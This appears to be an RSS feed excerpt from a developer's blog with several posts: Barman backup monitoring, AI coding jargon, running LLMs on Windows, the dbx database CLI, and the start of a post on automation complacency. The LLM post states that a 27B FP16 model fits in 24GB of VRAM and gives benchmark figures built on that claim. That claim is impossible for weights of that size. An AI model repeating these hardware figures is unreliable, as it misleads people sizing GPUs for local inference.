<li><strong>Run <code>barman check</code></strong> — everything should be green now</li>
<li><strong>Take your first backup</strong>: <code>barman backup mydb</code></li>
</ol>
<h2 id="heading-prevention-dont-wait-for-disaster">Prevention: Don't Wait for Disaster</h2>
<p>Once everything is green, set up monitoring. A few things to watch:</p>
<ul>
<li><strong>Run <code>barman check</code> in your monitoring system</strong> — it returns non-zero exit codes on failure, so it plugs into Nagios, Prometheus exporters, or a simple cron-based alerting script</li>
<li><strong>Set a retention policy</strong> so old backups get cleaned up automatically:</li>
</ul>
<pre><code class="lang-ini"><span class="hljs-comment"># In your server config</span>
<span class="hljs-attr">retention_policy</span> = RECOVERY WINDOW OF <span class="hljs-number">7</span> DAYS
</code></pre>
<ul>
<li><strong>Test recovery regularly</strong>. A backup you've never restored is a backup you don't have. Schedule a monthly test restore to a scratch server:</li>
</ul>
<pre><code class="lang-bash"><span class="hljs-comment"># Restore latest backup to a temporary location</span>
barman recover mydb latest /tmp/pg_restore_test \
  --remote-ssh-command <span class="hljs-string">"ssh postgres@test-host"</span>
</code></pre>
<ul>
<li><strong>Monitor replication slot lag</strong> to catch the disk-filling scenario I mentioned earlier</li>
</ul>
<h2 id="heading-wrapping-up">Wrapping Up</h2>
<p>Barman's initial setup friction is real, but it's a one-time cost. Once it's running, it's genuinely solid tooling — I've relied on it across multiple production Postgres deployments and it's saved me more than once during actual incidents.</p>
<p>The key insight is that most Barman failures aren't Barman problems. They're SSH permission issues, PostgreSQL configuration oversights, or missing cron entries. Fix the foundation and Barman just works.</p>
<p>If <code>barman check</code> is still showing failures after going through all of this, the <a target="_blank" href="https://docs.pgbarman.org/">official Barman documentation</a> is thorough and well-organized. The <code>barman diagnose</code> command is also your friend — it dumps the full configuration and system state into a format you can paste into a GitHub issue if you're truly stuck.</p>
]]></content:encoded></item><item><title><![CDATA[AI Coding Has Its Own Language Now — Here's How to Decode It]]></title><description><![CDATA[If you've tried to follow any AI coding discussion in the last six months, you've probably felt like everyone suddenly started speaking a dialect you never signed up to learn. "Vibe coding." "Agentic workflows." "Context windows." "Prompt engineering...]]></description><link>https://alan-west.hashnode.dev/ai-coding-has-its-own-language-now-heres-how-to-decode-it</link><guid isPermaLink="true">https://alan-west.hashnode.dev/ai-coding-has-its-own-language-now-heres-how-to-decode-it</guid><category><![CDATA[AI]]></category><category><![CDATA[Developer Tools]]></category><category><![CDATA[Productivity]]></category><category><![CDATA[General Programming]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 03 May 2026 17:36:57 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483868/pexels-photo-17483868.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you've tried to follow any AI coding discussion in the last six months, you've probably felt like everyone suddenly started speaking a dialect you never signed up to learn. "Vibe coding." "Agentic workflows." "Context windows." "Prompt engineering." The jargon is multiplying faster than JavaScript frameworks, and that's saying something.</p>
<p>Matt Pocock — who you might know from his TypeScript education work at <a target="_blank" href="https://www.totaltypescript.com/">Total TypeScript</a> — apparently felt the same frustration. He's put together a <a target="_blank" href="https://github.com/mattpocock/dictionary-of-ai-coding">dictionary-of-ai-coding</a> repository on GitHub that attempts to explain AI coding jargon in plain English. It's been trending, and honestly, it's the kind of resource I wish existed six months ago.</p>
<h2 id="heading-why-this-matters-more-than-you-think">Why This Matters More Than You Think</h2>
<p>Here's the thing: the AI coding space is moving so fast that terms get invented, redefined, and sometimes abandoned within weeks. I've been in meetings where three developers used the same term to mean three different things. That's not a terminology problem — that's a communication breakdown that leads to bad architecture decisions.</p>
<p>Consider how many developers are now interacting with AI tools daily. Whether you're using Cursor, GitHub Copilot, Claude Code, or any other AI-assisted coding tool, you're swimming in terminology that didn't exist two years ago. Having a shared vocabulary isn't just nice — it's necessary.</p>
<h2 id="heading-some-terms-worth-actually-understanding">Some Terms Worth Actually Understanding</h2>
<p>Let me walk through a few AI coding terms that I think every developer should internalize, not just recognize.</p>
<h3 id="heading-context-window">Context Window</h3>
<p>This is the total amount of text (measured in tokens) that an AI model can "see" at once. Think of it like the model's working memory.</p>
<pre><code class="lang-python"><span class="hljs-comment"># A simplified mental model of context windows</span>
context_window = {
    <span class="hljs-string">"system_prompt"</span>: <span class="hljs-number">500</span>,      <span class="hljs-comment"># instructions to the model</span>
    <span class="hljs-string">"conversation_history"</span>: <span class="hljs-number">3000</span>,  <span class="hljs-comment"># prior messages</span>
    <span class="hljs-string">"current_code"</span>: <span class="hljs-number">2000</span>,      <span class="hljs-comment"># the file you're working on</span>
    <span class="hljs-string">"available_for_response"</span>: <span class="hljs-number">2500</span>  <span class="hljs-comment"># what's left for the AI to generate</span>
}
<span class="hljs-comment"># When you hit the limit, older context gets dropped</span>
<span class="hljs-comment"># This is why AI "forgets" things in long conversations</span>
</code></pre>
<p>Why does this matter practically? Because when your AI coding assistant starts giving weird suggestions halfway through a session, it's probably not broken — it's lost context. Understanding this changes how you structure your interactions.</p>
<h3 id="heading-agentic-coding">Agentic Coding</h3>
<p>This is where the AI doesn't just suggest code — it takes actions. It reads files, runs commands, creates branches, executes tests. The shift from "autocomplete on steroids" to "junior developer who never sleeps" is the agentic shift.</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// Non-agentic: AI suggests code inline</span>
<span class="hljs-comment">// You: "write a function to parse CSV"</span>
<span class="hljs-comment">// AI: here's a function (you copy-paste it)</span>

<span class="hljs-comment">// Agentic: AI takes autonomous actions</span>
<span class="hljs-comment">// You: "add CSV parsing to the data pipeline"</span>
<span class="hljs-comment">// AI: </span>
<span class="hljs-comment">//   1. reads your existing pipeline code</span>
<span class="hljs-comment">//   2. creates a new parser module</span>
<span class="hljs-comment">//   3. writes tests</span>
<span class="hljs-comment">//   4. runs the tests</span>
<span class="hljs-comment">//   5. fixes failures</span>
<span class="hljs-comment">//   6. commits the changes</span>
</code></pre>
<p>I've been using agentic coding tools more heavily over the past few months, and the mental model shift is real. You stop thinking about <em>writing</em> code and start thinking about <em>reviewing</em> code. That's a fundamentally different skill.</p>
<h3 id="heading-vibe-coding">Vibe Coding</h3>
<p>Coined by Andrej Karpathy, this one describes the practice of building software by describing what you want in natural language and letting AI handle the implementation details. You're coding by vibes, not by syntax.</p>
<p>It sounds wild, but I've seen people build functional prototypes this way in hours. The catch? The code quality is often... questionable. Vibe coding is great for prototyping and terrible for production systems that need to be maintained.</p>
<h3 id="heading-prompt-engineering-vs-prompt-design">Prompt Engineering vs. Prompt Design</h3>
<p>I've noticed people using these interchangeably, but they're subtly different. Prompt engineering is the technical practice of crafting inputs to get specific outputs from a model. Prompt design is broader — it's about designing the entire interaction pattern, including system prompts, context management, and output formatting.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Prompt engineering (tactical)</span>
<span class="hljs-attr">prompt:</span> <span class="hljs-string">"Convert this function to use async/await. 
        Keep error handling. Return the same types."</span>

<span class="hljs-comment"># Prompt design (strategic)</span>
<span class="hljs-attr">system:</span> <span class="hljs-string">"You are a code modernization assistant.
        Always preserve existing tests.
        Explain breaking changes before making them."</span>
<span class="hljs-attr">context:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">existing_code:</span> <span class="hljs-string">"./src/legacy/"</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">test_suite:</span> <span class="hljs-string">"./tests/"</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">style_guide:</span> <span class="hljs-string">"./.eslintrc"</span>
<span class="hljs-attr">output_format:</span> <span class="hljs-string">"diff with inline comments"</span>
</code></pre>
<h2 id="heading-the-meta-problem-jargon-as-gatekeeping">The Meta-Problem: Jargon as Gatekeeping</h2>
<p>Here's where I get a bit opinionated. The rapid proliferation of AI coding jargon has a real gatekeeping effect. When senior engineers casually throw around terms like "RAG pipeline," "few-shot prompting," and "temperature tuning" in standups, junior developers nod along while internally panicking.</p>
<p>That's why open, community-maintained resources like Matt Pocock's dictionary matter. They lower the barrier to entry. You don't need to take a course or read a paper — you just need a plain-English explanation you can reference in two minutes.</p>
<h2 id="heading-how-to-actually-keep-up">How to Actually Keep Up</h2>
<p>A few practical strategies that have worked for me:</p>
<ul>
<li><strong>Learn terms in context, not in isolation.</strong> Don't memorize definitions. Use an AI coding tool, hit a concept you don't understand, look it up, then keep going. The hands-on context makes it stick.</li>
<li><strong>Build a personal glossary.</strong> I keep a markdown file in my notes app. When I encounter a new term, I write down what I <em>think</em> it means, then verify. The act of writing it down is what cements it.</li>
<li><strong>Follow the tool changelogs.</strong> Cursor, Copilot, Claude Code — they all publish updates. Reading changelogs teaches you terminology naturally because the terms are attached to real features.</li>
<li><strong>Track your own tools.</strong> On a related note, privacy-focused analytics tools like Umami or Plausible can help you understand how developers interact with your projects and docs without invasive tracking — useful if you're building developer tools yourself.</li>
</ul>
<h2 id="heading-the-dictionary-approach-is-smart">The Dictionary Approach Is Smart</h2>
<p>What I appreciate about the dictionary-of-ai-coding repo is the format. It's not a tutorial. It's not a course. It's a reference. When you're in the middle of reading a blog post or sitting in a meeting and someone drops a term you don't know, you want a 30-second answer, not a 30-minute video.</p>
<p>The repo is open source, which means the community can contribute definitions and keep them updated as the terminology evolves. That's important because — and I cannot stress this enough — the definitions <em>will</em> change. "Agent" meant something different in AI circles twelve months ago than it does today.</p>
<h2 id="heading-my-advice-dont-panic-but-dont-ignore-it-either">My Advice: Don't Panic, But Don't Ignore It Either</h2>
<p>If you're feeling overwhelmed by AI coding terminology, you're in good company. The field is genuinely moving fast, and nobody has it all figured out. But here's the thing — you don't need to know every term. You need to know the ones that affect your daily work.</p>
<p>Start with the basics: context windows, tokens, prompts, agents. Bookmark <a target="_blank" href="https://github.com/mattpocock/dictionary-of-ai-coding">Matt's dictionary</a> for when you hit something unfamiliar. And most importantly, don't let jargon stop you from actually <em>using</em> these tools.</p>
<p>The developers who'll thrive aren't the ones who can define every term perfectly. They're the ones who can ship code — with or without AI assistance — and communicate clearly about what they're doing. A shared vocabulary just makes that communication easier.</p>
]]></content:encoded></item><item><title><![CDATA[Running LLMs on Windows: Native vLLM vs WSL vs llama.cpp Compared]]></title><description><![CDATA[The Windows local LLM story just got interesting. Someone recently demonstrated Qwen3's 27B model running at 72 tokens per second on an RTX 3090 — natively on Windows. No WSL. No Docker. Just a portable vLLM launcher.
If you've been running local mod...]]></description><link>https://alan-west.hashnode.dev/running-llms-on-windows-native-vllm-vs-wsl-vs-llamacpp-compared</link><guid isPermaLink="true">https://alan-west.hashnode.dev/running-llms-on-windows-native-vllm-vs-wsl-vs-llamacpp-compared</guid><category><![CDATA[llm]]></category><category><![CDATA[MachineLearning]]></category><category><![CDATA[vLLM]]></category><category><![CDATA[Windows]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 03 May 2026 16:23:17 GMT</pubDate><enclosure url="https://images.pexels.com/photos/2105927/pexels-photo-2105927.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The Windows local LLM story just got interesting. Someone recently demonstrated Qwen3's 27B model running at 72 tokens per second on an RTX 3090 — natively on Windows. No WSL. No Docker. Just a portable vLLM launcher.</p>
<p>If you've been running local models on Windows, you know the pain. Let me break down how the landscape has shifted and help you pick the right inference stack.</p>
<h2 id="heading-why-this-comparison-matters-now">Why This Comparison Matters Now</h2>
<p>For the longest time, running vLLM on Windows meant one of two things: spin up WSL2 or wrestle with Docker Desktop. Both add overhead, complexity, and weird networking quirks. Native Windows support changes the calculus entirely.</p>
<p>I've been running local models for inference on my dev machine for months — mostly through llama.cpp and Ollama. When I saw native vLLM hitting 72 tok/s on a 3090 with a 27B parameter model, I had to dig in.</p>
<h2 id="heading-the-contenders">The Contenders</h2>
<p>Here's what we're comparing:</p>
<ul>
<li><strong>Native vLLM on Windows</strong> — the new kid, portable launcher approach</li>
<li><strong>vLLM via WSL2</strong> — the established "proper" way</li>
<li><strong>llama.cpp (direct)</strong> — the GGUF Swiss army knife</li>
<li><strong>Ollama</strong> — the "just works" option</li>
</ul>
<h2 id="heading-setup-complexity">Setup Complexity</h2>
<h3 id="heading-native-vllm-windows">Native vLLM (Windows)</h3>
<p>From what's been shared, the portable installer handles CUDA dependencies and sets up vLLM without requiring a Linux subsystem:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Reportedly as simple as:</span>
./vllm-launcher.exe --model Qwen/Qwen3-27B --gpu-memory-utilization 0.95

<span class="hljs-comment"># The launcher handles:</span>
<span class="hljs-comment"># - CUDA toolkit detection/bundling</span>
<span class="hljs-comment"># - Python environment isolation</span>
<span class="hljs-comment"># - Model downloading and caching</span>
</code></pre>
<p>The "portable" aspect is key — no global Python installation conflicts, no PATH pollution.</p>
<h3 id="heading-vllm-via-wsl2">vLLM via WSL2</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># First, ensure WSL2 is set up with CUDA passthrough</span>
wsl --install -d Ubuntu-22.04

<span class="hljs-comment"># Inside WSL:</span>
pip install vllm
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen3-27B \
  --tensor-parallel-size 1 \
  --gpu-memory-utilization 0.95
</code></pre>
<p>Works well, but you're maintaining a full Linux userspace. GPU passthrough occasionally breaks after Windows updates. Ask me how I know.</p>
<h3 id="heading-llamacpp">llama.cpp</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Download a GGUF quantized model</span>
<span class="hljs-comment"># Run the server with CUDA acceleration</span>
./llama-server.exe -m qwen3-27b-q4_k_m.gguf \
  -ngl 99 \
  -c 8192 \
  --host 0.0.0.0 \
  --port 8080

<span class="hljs-comment"># -ngl 99: offload all layers to GPU</span>
<span class="hljs-comment"># -c 8192: context window size</span>
</code></pre>
<p>Native Windows binary. No fuss. But you're using quantized models (usually Q4 or Q5), which trades some quality for speed and memory savings.</p>
<h3 id="heading-ollama">Ollama</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Literally just:</span>
ollama run qwen3:27b

<span class="hljs-comment"># Or serve it as an API:</span>
ollama serve
<span class="hljs-comment"># Then: curl http://localhost:11434/api/generate -d '{"model": "qwen3:27b", "prompt": "hello"}'</span>
</code></pre>
<p>Ollama wins on simplicity every single time. It's the <code>brew install</code> of local LLMs.</p>
<h2 id="heading-performance-comparison-rtx-3090-24gb-vram">Performance Comparison (RTX 3090, 24GB VRAM)</h2>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Stack</td><td>Model Format</td><td>~Throughput</td><td>VRAM Usage</td><td>Quality</td></tr>
</thead>
<tbody>
<tr>
<td>Native vLLM</td><td>FP16/BF16</td><td>~72 tok/s</td><td>~22GB</td><td>Full precision</td></tr>
<tr>
<td>WSL vLLM</td><td>FP16/BF16</td><td>~65-70 tok/s</td><td>~22GB + WSL overhead</td><td>Full precision</td></tr>
<tr>
<td>llama.cpp</td><td>Q4_K_M GGUF</td><td>~45-55 tok/s</td><td>~16GB</td><td>Slight quality loss</td></tr>
<tr>
<td>Ollama</td><td>Q4_K_M (internal)</td><td>~40-50 tok/s</td><td>~16GB</td><td>Slight quality loss</td></tr>
</tbody>
</table>
</div><p><em>Note: These are approximate numbers based on community reports. Your mileage will vary based on context length, batch size, and specific GPU silicon lottery.</em></p>
<p>The native vLLM numbers are impressive because you're getting full-precision inference without the WSL tax. That 5-10% overhead from the virtualization layer adds up.</p>
<h2 id="heading-when-to-use-what">When to Use What</h2>
<p><strong>Choose native vLLM if:</strong></p>
<ul>
<li>You need maximum throughput with full precision</li>
<li>You're building production-adjacent inference pipelines</li>
<li>You want PagedAttention and continuous batching</li>
<li>You don't want to maintain a WSL environment</li>
</ul>
<p><strong>Choose WSL vLLM if:</strong></p>
<ul>
<li>You need the full vLLM ecosystem (already battle-tested on Linux)</li>
<li>You're comfortable with WSL and already have it configured</li>
<li>You need features that might not be in the Windows port yet</li>
</ul>
<p><strong>Choose llama.cpp if:</strong></p>
<ul>
<li>You want maximum flexibility with model formats</li>
<li>You're fine with quantized models (honestly, Q5_K_M is barely distinguishable from FP16 for most tasks)</li>
<li>You need to run on machines with less VRAM</li>
<li>You want one static binary with zero dependencies</li>
</ul>
<p><strong>Choose Ollama if:</strong></p>
<ul>
<li>You want zero configuration</li>
<li>You're prototyping or doing local development</li>
<li>You need quick model switching</li>
<li>You're not chasing maximum throughput</li>
</ul>
<h2 id="heading-migration-from-ollamallamacpp-to-native-vllm">Migration: From Ollama/llama.cpp to Native vLLM</h2>
<p>If you're currently using Ollama or llama.cpp and want to try native vLLM for better throughput:</p>
<h3 id="heading-step-1-check-your-vram-budget">Step 1: Check Your VRAM Budget</h3>
<p>A 27B parameter model in FP16 needs roughly 54GB in theory, but with vLLM's memory management, it reportedly fits in 24GB through aggressive KV-cache optimization. Confirm your GPU can handle it.</p>
<h3 id="heading-step-2-swap-your-api-calls">Step 2: Swap Your API Calls</h3>
<p>vLLM exposes an OpenAI-compatible API, so migration is straightforward:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> openai

<span class="hljs-comment"># Before (Ollama):</span>
client = openai.OpenAI(
    base_url=<span class="hljs-string">"http://localhost:11434/v1"</span>,
    api_key=<span class="hljs-string">"ollama"</span>  <span class="hljs-comment"># Ollama doesn't validate this</span>
)

<span class="hljs-comment"># After (native vLLM):</span>
client = openai.OpenAI(
    base_url=<span class="hljs-string">"http://localhost:8000/v1"</span>,
    api_key=<span class="hljs-string">"token-abc123"</span>  <span class="hljs-comment"># vLLM's default</span>
)

<span class="hljs-comment"># Your actual inference code stays the same</span>
response = client.chat.completions.create(
    model=<span class="hljs-string">"Qwen/Qwen3-27B"</span>,
    messages=[{<span class="hljs-string">"role"</span>: <span class="hljs-string">"user"</span>, <span class="hljs-string">"content"</span>: <span class="hljs-string">"Explain PagedAttention"</span>}],
    temperature=<span class="hljs-number">0.7</span>
)
</code></pre>
<p>Since both expose OpenAI-compatible endpoints, your application code barely changes.</p>
<h3 id="heading-step-3-benchmark-your-workload">Step 3: Benchmark YOUR Workload</h3>
<p>Don't trust anyone's benchmarks (including mine). Run your actual prompts:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> time

prompts = load_your_actual_prompts()  <span class="hljs-comment"># Use real data</span>

start = time.perf_counter()
<span class="hljs-keyword">for</span> prompt <span class="hljs-keyword">in</span> prompts:
    response = client.chat.completions.create(
        model=<span class="hljs-string">"Qwen/Qwen3-27B"</span>,
        messages=[{<span class="hljs-string">"role"</span>: <span class="hljs-string">"user"</span>, <span class="hljs-string">"content"</span>: prompt}],
        max_tokens=<span class="hljs-number">512</span>
    )
elapsed = time.perf_counter() - start
print(<span class="hljs-string">f"Total: <span class="hljs-subst">{elapsed:<span class="hljs-number">.1</span>f}</span>s for <span class="hljs-subst">{len(prompts)}</span> prompts"</span>)
</code></pre>
<h2 id="heading-the-bigger-picture">The Bigger Picture</h2>
<p>Native Windows support for vLLM is a big deal for the local inference ecosystem. The WSL requirement was a genuine barrier — not because it's hard to set up, but because it adds a layer of indirection that complicates deployment, debugging, and resource management.</p>
<p>That said, I wouldn't abandon llama.cpp or Ollama. They solve different problems. If you're running quantized models on consumer hardware and don't need continuous batching, llama.cpp remains excellent. If you want a five-second setup for prototyping, Ollama is unbeatable.</p>
<p>But if you're building anything that needs to serve multiple concurrent requests with full-precision models on Windows — native vLLM just became the obvious choice.</p>
<p>I'm planning to do more thorough benchmarks once the portable launcher stabilizes. For now, the early numbers are promising enough that it's worth keeping on your radar.</p>
]]></content:encoded></item><item><title><![CDATA[How to Stop Juggling 5 Different Database Clients in Development]]></title><description><![CDATA[If you've ever had a terminal with pgAdmin open in one tab, a Redis CLI in another, MySQL Workbench somewhere in the background, and a MongoDB Compass window you forgot about — you know the pain. You're not actually doing database work. You're doing ...]]></description><link>https://alan-west.hashnode.dev/how-to-stop-juggling-5-different-database-clients-in-development</link><guid isPermaLink="true">https://alan-west.hashnode.dev/how-to-stop-juggling-5-different-database-clients-in-development</guid><category><![CDATA[cli]]></category><category><![CDATA[database]]></category><category><![CDATA[devtools]]></category><category><![CDATA[Productivity]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 03 May 2026 14:26:52 GMT</pubDate><enclosure url="https://images.pexels.com/photos/5480781/pexels-photo-5480781.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you've ever had a terminal with pgAdmin open in one tab, a Redis CLI in another, MySQL Workbench somewhere in the background, and a MongoDB Compass window you forgot about — you know the pain. You're not actually doing database work. You're doing window management.</p>
<p>I hit this wall recently on a project that used PostgreSQL for the main data store, Redis for caching, and SQLite for a local analytics pipeline. Three databases, three completely different tools, three sets of keyboard shortcuts, three ways to export a query result. It's death by a thousand context switches.</p>
<p>The root problem isn't that these tools are bad individually. It's that <strong>no single client historically covered all the databases a modern project touches</strong>.</p>
<h2 id="heading-why-multi-database-tooling-is-broken">Why Multi-Database Tooling Is Broken</h2>
<p>Most database clients fall into one of two camps:</p>
<ul>
<li><strong>Specialized clients</strong> (pgAdmin, Redis Insight, MongoDB Compass) — great for one database, useless for everything else</li>
<li><strong>Universal GUI clients</strong> (DBeaver, DataGrip) — they cover a lot of databases but are heavyweight, often slow to start, and the free tiers can be limited</li>
</ul>
<p>For quick development queries, neither camp is ideal. I don't need a full visual schema designer. I need to run a query, see the result, and get back to coding. The overhead of launching a full GUI app for a <code>SELECT * FROM users WHERE id = 42</code> is absurd.</p>
<p>This is where lightweight, terminal-native database clients start to make a lot of sense.</p>
<h2 id="heading-enter-dbx-one-cli-client-for-almost-everything">Enter dbx: One CLI Client for (Almost) Everything</h2>
<p>I stumbled on <a target="_blank" href="https://github.com/t8y2/dbx">dbx</a> recently — it's an open-source, cross-platform database client that supports MySQL, PostgreSQL, SQLite, Redis, MongoDB, DuckDB, ClickHouse, SQL Server, and more from a single tool.</p>
<p>The pitch is simple: one binary, multiple database engines, terminal-native. No Electron app eating 800MB of RAM.</p>
<h3 id="heading-getting-connected">Getting Connected</h3>
<p>The typical workflow with a tool like this looks something like:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Connect to your PostgreSQL instance</span>
dbx --driver postgres --host localhost --port 5432 --db myapp_dev --user dev

<span class="hljs-comment"># Or hit a local SQLite file directly</span>
dbx --driver sqlite --db ./analytics.db

<span class="hljs-comment"># Connect to Redis</span>
dbx --driver redis --host localhost --port 6379
</code></pre>
<p>The key thing here is the mental model stays the same regardless of the backend. You're not learning a new tool for each database — you're learning one interface and pointing it at different engines.</p>
<h3 id="heading-running-queries-across-engines">Running Queries Across Engines</h3>
<p>Once connected, you interact with your database through a consistent interface. For SQL databases, you write SQL. For document stores like MongoDB, you use the query syntax appropriate to that engine. But the <em>experience</em> — connecting, viewing results, exiting — stays uniform.</p>
<pre><code class="lang-sql"><span class="hljs-comment">-- Works the same whether you're on PostgreSQL, MySQL, or SQLite</span>
<span class="hljs-keyword">SELECT</span> u.email, <span class="hljs-keyword">COUNT</span>(o.id) <span class="hljs-keyword">as</span> order_count
<span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> u
<span class="hljs-keyword">LEFT</span> <span class="hljs-keyword">JOIN</span> orders o <span class="hljs-keyword">ON</span> o.user_id = u.id
<span class="hljs-keyword">WHERE</span> u.created_at &gt; <span class="hljs-string">'2025-01-01'</span>
<span class="hljs-keyword">GROUP</span> <span class="hljs-keyword">BY</span> u.email
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> order_count <span class="hljs-keyword">DESC</span>
<span class="hljs-keyword">LIMIT</span> <span class="hljs-number">20</span>;
</code></pre>
<p>No remembering whether it's <code>psql</code>'s <code>\dt</code> or MySQL's <code>SHOW TABLES</code>. One tool, consistent behavior.</p>
<h2 id="heading-the-real-fix-consolidating-your-database-workflow">The Real Fix: Consolidating Your Database Workflow</h2>
<p>Here's the step-by-step approach I've started using to tame the multi-database chaos:</p>
<h3 id="heading-step-1-audit-your-database-touchpoints">Step 1: Audit Your Database Touchpoints</h3>
<p>Before installing anything, figure out what you're actually connecting to day-to-day:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Check what's running locally</span>
<span class="hljs-comment"># Look for common database ports</span>
lsof -i :5432  <span class="hljs-comment"># PostgreSQL</span>
lsof -i :3306  <span class="hljs-comment"># MySQL</span>
lsof -i :6379  <span class="hljs-comment"># Redis</span>
lsof -i :27017 <span class="hljs-comment"># MongoDB</span>
lsof -i :9000  <span class="hljs-comment"># ClickHouse</span>
</code></pre>
<p>Most developers I know are touching 2-4 different database engines regularly. If you're only on one engine, a specialized client is probably fine. But the moment you hit two or more, consolidation pays off immediately.</p>
<h3 id="heading-step-2-replace-individual-clis-with-a-unified-tool">Step 2: Replace Individual CLIs with a Unified Tool</h3>
<p>Instead of maintaining muscle memory for <code>psql</code>, <code>mysql</code>, <code>redis-cli</code>, and <code>mongosh</code> separately, use a single client that normalizes the experience. A tool like dbx gives you that.</p>
<p>The advantage isn't just fewer tools to install — it's fewer tools to <em>configure</em>. One place for connection strings, one set of keybindings, one output format.</p>
<h3 id="heading-step-3-script-your-common-connections">Step 3: Script Your Common Connections</h3>
<p>Once you've settled on a unified client, alias your common connections:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Add to your .bashrc or .zshrc</span>
<span class="hljs-built_in">alias</span> db-main=<span class="hljs-string">'dbx --driver postgres --host localhost --port 5432 --db myapp_dev --user dev'</span>
<span class="hljs-built_in">alias</span> db-cache=<span class="hljs-string">'dbx --driver redis --host localhost --port 6379'</span>
<span class="hljs-built_in">alias</span> db-analytics=<span class="hljs-string">'dbx --driver sqlite --db ~/projects/myapp/analytics.db'</span>
<span class="hljs-built_in">alias</span> db-warehouse=<span class="hljs-string">'dbx --driver duckdb --db ~/data/warehouse.duckdb'</span>
</code></pre>
<p>Now switching between databases is literally typing <code>db-main</code> or <code>db-cache</code>. The cognitive overhead drops to near zero.</p>
<h3 id="heading-step-4-use-it-in-ci-and-scripting-too">Step 4: Use It in CI and Scripting Too</h3>
<p>A lightweight CLI tool shines in CI pipelines where you can't exactly install DBeaver. Need to verify a migration ran correctly? Need to seed test data across multiple database engines?</p>
<pre><code class="lang-bash"><span class="hljs-comment"># In a CI script — verify migration on PostgreSQL</span>
dbx --driver postgres --host <span class="hljs-variable">$DB_HOST</span> --db <span class="hljs-variable">$DB_NAME</span> --user <span class="hljs-variable">$DB_USER</span> \
  -e <span class="hljs-string">"SELECT COUNT(*) FROM information_schema.columns WHERE table_name = 'users' AND column_name = 'email_verified';"</span>

<span class="hljs-comment"># Check Redis cache is warm after deploy</span>
dbx --driver redis --host <span class="hljs-variable">$REDIS_HOST</span> \
  -e <span class="hljs-string">"DBSIZE"</span>
</code></pre>
<p>Having a single binary that handles multiple engines means your CI doesn't need to install three different client packages.</p>
<h2 id="heading-prevention-keeping-your-tooling-lean-going-forward">Prevention: Keeping Your Tooling Lean Going Forward</h2>
<p>A few principles I've adopted:</p>
<ul>
<li><strong>Default to one multi-engine client</strong> for day-to-day work. Only reach for a specialized tool when you need features the unified client genuinely lacks (like pgAdmin's visual EXPLAIN plans)</li>
<li><strong>Version-pin your database tools</strong> just like you version-pin your application dependencies. A database client update shouldn't silently change output formatting in your scripts</li>
<li><strong>Keep connection configs in dotfiles</strong>, not in GUI app preferences that don't survive a laptop migration</li>
<li><strong>Test your database tooling in CI</strong> before you need it in CI. Nothing worse than discovering your client doesn't support a flag when a deploy is waiting</li>
</ul>
<h2 id="heading-when-this-approach-doesnt-work">When This Approach Doesn't Work</h2>
<p>I want to be honest about the tradeoffs. A unified CLI client won't replace everything:</p>
<ul>
<li>If you live in <strong>visual query builders</strong>, you'll still want a GUI tool</li>
<li>For <strong>complex schema visualization</strong>, specialized tools like pgAdmin or MongoDB Compass have dedicated features that a CLI can't match</li>
<li>If your team is standardized on a <strong>specific client</strong>, switching for the sake of switching creates friction</li>
</ul>
<p>But for the 80% of database interactions that are "run a query, see the result, move on" — a single lightweight tool like dbx eliminates a surprising amount of daily friction.</p>
<p>I haven't tested every database engine dbx supports, and the project is relatively new, so I'd suggest checking the <a target="_blank" href="https://github.com/t8y2/dbx">GitHub repo</a> for the latest on driver support and any known limitations. But the <em>pattern</em> of consolidating database clients into one tool? That's been a genuine quality-of-life improvement for me, regardless of which specific tool you choose to do it with.</p>
]]></content:encoded></item><item><title><![CDATA[AI Coding Autopilot vs Manual Control: What Aviation Taught Us About Skill Decay]]></title><description><![CDATA[The aviation industry has a term that should terrify every developer leaning on AI coding tools: automation complacency. Pilots figured out decades ago that the more you rely on autopilot, the worse you get at actually flying the plane. And when the ...]]></description><link>https://alan-west.hashnode.dev/ai-coding-autopilot-vs-manual-control-what-aviation-taught-us-about-skill-decay</link><guid isPermaLink="true">https://alan-west.hashnode.dev/ai-coding-autopilot-vs-manual-control-what-aviation-taught-us-about-skill-decay</guid><category><![CDATA[AI]]></category><category><![CDATA[Productivity]]></category><category><![CDATA[General Programming]]></category><category><![CDATA[webdev]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sat, 02 May 2026 23:16:35 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483874/pexels-photo-17483874.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The aviation industry has a term that should terrify every developer leaning on AI coding tools: <strong>automation complacency</strong>. Pilots figured out decades ago that the more you rely on autopilot, the worse you get at actually flying the plane. And when the autopilot fails — because it always eventually does — you'd better hope your manual skills haven't atrophied.</p>
